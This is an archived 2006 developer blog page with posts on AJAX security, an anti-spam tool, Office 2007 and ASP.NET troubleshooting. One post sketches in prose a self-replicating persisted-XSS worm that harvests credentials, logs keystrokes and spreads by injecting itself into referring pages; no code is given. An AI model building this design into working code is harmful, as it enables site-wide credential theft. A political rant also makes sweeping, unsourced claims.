home links tools blog about
home

« October 2006 | Main | January 2007 »

November 30, 2006

Test XSS Post

Ignore this post - unless you get a JS popup. In which case your RSS aggregator does NOT have your back.

If you're reading this in a browser (i.e. visiting my blog) and get a popup, you've been pwn3d!!!! (jk)

Posted on November 30, 2006 | | Comments (0) | TrackBack (0)

Self-Replicating XSS Worm

So, I'm working (night and day, and day and night) on an 60 minute AJAX Security presentation that will be used by MSDN presenters to help remind web developers of ... you guessed it: AJAX Security.

But, I think I've been spending a bit too much time contemplating various XSS attack vectors. In fact, partially inspired by "Samy" I've come up with my own sinister plot, and thought I'd share it:

Disaster: 
3 Scoops Exploit, and 1 cup of negligence: Hacker manages to execute a persisted XSS attack against a site that blindly trusts either user-input, persists it, and outputs it to subsequent visitors. (i.e. like a forum site, etc.)

2 teaspoons of Malice: Hacker uploads/inserts an evil.js file into the browser, and after harvesting credentials (and possibly logging keystrokes, etc.) executes a snifty function called Replicate(). Replicate is a JS function that checks the referrer to the current site, if there is one, and then attempts various SILENT exploits against the referring page - attempting to locate other pages, formfields, etc that might be susceptible to persisted XSS attacks. (It can just use the XmlHttpRequest object to request, parse, and interact with referring pages (from the same site) because they won't be blocked from interaction due to the 'Server of Origin' policy.)

Mix Well, and Simmer: If other pages are compromised, the code injected in to them will instruct browsers to load the same 'evil.js' file, which will subsequently check new referrers and attempt to compromise them.

With any luck, huge chunks of an entire site could be swamped with credential harvesting, keystroke logging, self-replicating evil.... it's like the Borg all over again. (And, I'm sure evil (or good) genius hacker out there has already coded this pig... I'm just happy I was able to come up with this idea all on my own... )

Posted on November 30, 2006 | | Comments (0) | TrackBack (0)

November 25, 2006

My Vote for worst documentation this year

One of my favorite jokes:

A Helicopter Tour of Seattle ran into trouble one day as incredibly thick fog made it impossible for the pilots to see anything. Eventually, the pilots had to slow to a crawl, to avoid flying in to anything. Finally the helicopter arrived at a large office building. People in the building rushed to the windows to see a helicopter hovering outside in the fog.

Then one of the pilots got an idea: on a piece of paper, in big letters, he wrote: "Where are we?"

Some people in the building rushed to a desk, scribbled something down, then ran back to the window - holding up a big sign. "You are in a Helicopter!" read the sign.

The pilot gave the office-workers a nice smile and a big 'thumbs up' and turned the helicopter a few degrees to the left and began to fly into the fog.

Within 20 minutes the helicopter arrived safely back at the airport without any mis-hap. Stunned, one of the passengers asked: "How in the world were you able to figure out how to get back to the airport from that idiotic response?"

"Oh, that was simple," said the pilot. "The answer was technically correct, but totally useless - which meant we were at the Microsoft Campus. Once I had that figured out, it was just a question of flying back to base... "

In that spirit, I was looking for some validation that a dedicated SQL Server box should have its "Memory Usage" option set to System cache instead of Programs.

Googling for specifics on this one actually turned out a bit harder than I would have anticipated. (Seriously, details on what each option does to the underlying system would be great to have...)

Then I found this gem - I've included a screen cap of it in all of its glory just so you won't have to follow the link:

Tell me that's not awesome documentation. Though I think they forgot to tell you how to click on the OK button...  (And don't worry - I checked the links from this page - nothing explained what the POINT of changing these would be.... )

Posted on November 25, 2006 | | Comments (1) | TrackBack (0)

November 21, 2006

RDOS 3.1 Update

So... RDOS 3.1 is still under way. In fact it's code complete. I've just been seriously taking my time testing it. (No, not that I've been testing it THAT well, just taking my time to test it... if you follow my meaning.)

I decided to ditch Virtual Path Provider support, though I'll probably just throw it back in a bit later just for the SubText folks if they still want it. (It's a bit too complex at this point, and not suited too particularly to most end-users).

Otherwise, one of the big changes is the addition of rules. Previously RDOS just used filters - patterns that you'd set up in an attempt to block spam. That works pretty well, especially if you've got the time to keep updating them, or are lucky enough to get a single pattern that traps most types of spam. But it doesn't work well when you're just trying to protect certain directories from certain types of traffic. So now RDOS has support for rules - which basically say: "open season on anything that tries to POST to such and such directory". The rules can be pretty complex, but I've found them insanely useful at this point.

In fact, I left my old blog up on AngryPets.com as a type of 'honey-pot' for spammers. Spams against that 'honey-pot' site were coming in at roughly the rate of 500/day. (Weekends were a little worse actually). I just threw up RDOS with a rule against that blog, denying POSTs, and as soon as it went up, my inbox went quiet - no more spams.

I've almost got a whole battery of functional tests (too complex to be considered unit-tests, and they don't test code but outcome) ready for prime-time. Once I've got those done, I'll release them, along with some beta versions of RDOS 3.1...

There-after I'll look in to doing some stuff catered to SubText, and likely just turn RDOS over as an open-source app...

Posted on November 21, 2006 | | Comments (4)

November 20, 2006

Funniest Blog Post in a While

Here's a funny post for you - one of the best I've seen in a long while...

Posted on November 20, 2006 | | Comments (0) | TrackBack (0)

November 15, 2006

Pffffbbbbbttttt

YOU
HAVE
GOT
TO
BE
KIDDING
ME

When will the world pull its head out of its own ass and wise up? Iran wants the UN to do something to Israel because of 'repeated' threats?

I can't stand it one day longer. Iran threatens every day to wipe Israel off the map. France and Germany are practically CHOMPING at the bit to shoot down Israeli planes attempting to stop Iran/Syria from re-arming Hizbullah with more missles, but French and German 'Peace Keepers' refuse to operate at night because it's too 'dangerous'? That, and they patently refuse to challenge potential militants/combatants for fear of inciting riots.

Oh, and let's not forget the EXCELLENT press campaign the the Palestinians and those bastard terrorists in Lebanon have waged - largely based on their ability to fake/fabricate news that uses outright lies and fabrications to play on western sympathies and make it look like the Israelis are some kind of un-human monsters. Yet this crap goes completely unchecked by the media.

Muhammad al-Dura. The staged blood-libel that started it all.
Pallywood - yet the press laps it up.
The ambulance bombing that never was.
The chemical weapons that never were.
The new Anti-Semitism. (Why we need to worry about attempts to brand Jews/Israelis as sub-human monsters.)

Yet Hizbullah dropped more ordinance on Israel during their latest attack than Hitler managed to put on the British during WW II - yet NO ONE mentions it. Meanwhile, Kassam rockets are actually STILL falling on Israeli soil TODAY and killing people - yet the press only mentions the damage done by those horrible Jews.

So, sorry. I've had it. And i think it 's about time for the world to quit being stupid. In fact, everyone say it with me: Hating Jews isn't cool. They are NOT sub-human monsters. No, we don't have to love everything Israel does. But Israel and the Jews are NOT the cause of all of the world's problems.

Posted on November 15, 2006 | | Comments (2) | TrackBack (0)

November 13, 2006

Office 2007 - Definitely worth the upgrade

We all know how much, er... um... complaining I do on this site. Face it, I won't settle for anything less than perfection. And when it comes to Office, I'm totally merciless.

I've been using the Office 2007 Betas off and on over the past month or so, and I've been seriously impressed.

This morning I made the leap, and installed Office 2007 on my main machine. Installation was smoooooothe. Functionality is incredible. The eye-candy is PURE sugar (and high-fructose corn syrup).

Words alone will NOT describe how much better Word 2007 is than Word 2003. In fact, while I really wanted to upgrade to 2007 I just didnt' have time - and planned on upgrading Wednesday after finishing a huge project I'm working on now. (I'm sick of working on it now, and needed a break.)

But, after 20 minutes of battling Word 2003 on an existing document with HEAVY formatting, I decided that I'd had enough. I had seen enough of Word 2007 to know that some of my most DESPISED bugs were fixed. (For example, if you have a document with a few paragraphs, bulleted lists, headings, etc. in 2003 and do CTRL+A and change the font, when you do a new carriage return under existing content, you'll revert to the old font.... and other WORSE horrors that take too much energy to explain.)

At any rate. I took the leap, and installed Office 2007. Even with the time I lost during the install (which wasn't much), and having to really learn a new interface, I can confidently say that within about 3 hours of working with Office 2007 I'm now MUCH FARTHER ALONG THAN I WOULD BE with Word 2003.

My only complaints (you knew they were coming) are very simple ones  (in fact neither of them are really complaints - I just need to keep up the 'Angry' personna... ):
1) In Outlook, just get rid of the Today Page/Display if you're not going to give us any new/cool options to use for formatting that stuff. Is it just me, or is the Today screen useless? (And yeah, this isn't a complaint, it's a nit-pick. More importantly, the To-Do Bar is pwnz0r-ific, and invalidates the need for that stupid Today thingsy.
2) Man...I wish we could have the ribbon toolbars everywhere. I initially thought they were stupid (a long time ago), but I can't believe how well they work. There were a few times today where I really couldn't find options I needed, but then I sat and thought about it, and within 10 seconds I was able to find the options/tools/functionalty/etc. The Riboon Toolbars REALLY do make things much more intuitive. I just wish that OneNote and Outlook got hooked into that Ribbony goodness/love.

Frankly, the whole thing is SHINY. It's by far the best Office Experience I've ever had. It even gave me back a BUNCH of Faith in MS. This is a solid product, I'm also convinced that the user factors (in Word especially) are just brilliant - and more innovative than anything else out there. And from a complaining jerk-wad like me, that's a HUGE compliment -  but the Office Team deserves it.

(Maybe we can put together a petition to get the Office Team to give out extra Ribbon love to Outlook and OneNote? Hey, it worked for those pansy VB6 MVPs, and VB6 is so 20th century - this is a modern app. *ducks for cover*.)

Posted on November 13, 2006 | | Comments (1) | TrackBack (0)

November 10, 2006

XP's Virtual Memory Manager can bite me

Hard. Right square in the kiester.

I got tired of blowing my box out of RAM (by not having a page file) with all of the Virtual Machines I run. So I turned my paging file back on... thinking "how bad could it be?"

Then out of the blue, while using my box I get that insanely lame: Virtual Memory is too low.. your machine might chug and smoke while we use more of the HD to make it faster.

Faster? By moving memory to disk... ohhhkay.

You idiots do realize that I've got another solid, 1 GB of RAM laying around on my computer - just taking up space? And you're allocating more memory on my drive?

Killer.

Posted on November 10, 2006 | | Comments (0) | TrackBack (0)

Microsoft and HotFixes

I've lived for the past few years in total, abject, fear of hotfixes.

That's only because I've spent nearly an hour on the phone before waiting (after giving out a CC# - that wasn't charged) just to get one before.

But that was then.

Today I NEEDED a hotfix. MS needs to be slapped for not just giving you a number to call on their KB articles/links (seriously, go click the support link in that page...after 3 pages and trying to figure out who/what you are... you'll give up).

Since I couldn't find a good number to call, I just called MS' 1 800 number. The menu-ing system actually worked, and went something lik

... if you want support, press 2... .
... if you are a developer, press 3....
... if you would like a hotfix, press 1 (or 2.. can't remember)....

Then, like that I was connected. They just needed my first and last name, a phone number (in case we got cut off) and an email address. Then they needed the KB #. A brief warning about the nature of HotFixes (if you haven't pulled one down before), then they waited on the phone until the fix showed up in my email.

IMPRESSIVE. The whole thing took less than 7 minutes.

Posted on November 10, 2006 | | Comments (0) | TrackBack (0)

November 09, 2006

AspNetSql Providers and File Access Issues

BIG shout out to fellow ASPInsider Paul Glavich who saved my bacon on this one.

A while back I ran into an issue where membership info that I had saved to the ASPNETDB.mdf in my local site just didn't work after I moved the site to another location (i.e., to a different box). Turns out that since I had made some changes to provider details, and failed to explicitly specify an applicationName attribute, my Providers were all checking for logins/etc against a different appliation_id in the SQLEXPRESS database.

Scott Guthrie posted about it a while back.

So, imagine my surprise today when I ran into what seemed like the same thing: I moved my site, fired it up, tried to login, and bupkiss. Each time I'd log in, the page would just blink. Seemed to be EXACTLY the same behavior you'd get if your providers didn't explicitly specify an applicationName attribute. Only you can bet your sweet bippy I had explicitly specified that.

After yelling at my computer ("you lie!!!!1111oneoneone"), I posted an email. (Stepping in to the debugger I could see that the ApplicationName was indeed being handled correctly, but Membership.ValidateUser() was just never returning true. Worse, I could run copies of this site in VS 2005 and Cassini - I just couldn't run a copy of the site in a different IIS site listening for different headers.) Paul asked if both sites in IIS had the same perms. Well, duh... there it was. I had been so busy focusing on the ApplicationName goodness, that I had totally missed that.

The moral of the story? Actually, there are two:
1) Step away from the computer - rethink, it may not be what you think it is, etc.
2) The ASP.NET SQL Providers need to be SLAPPED for swallowing something HUGE like: "hey, dammit, I can't connect to the friggin' db because access to the 'attachable' SQLEXPRESS db is denied to NETWORK SERVICE."

Posted on November 09, 2006 | | Comments (0) | TrackBack (0)

Next »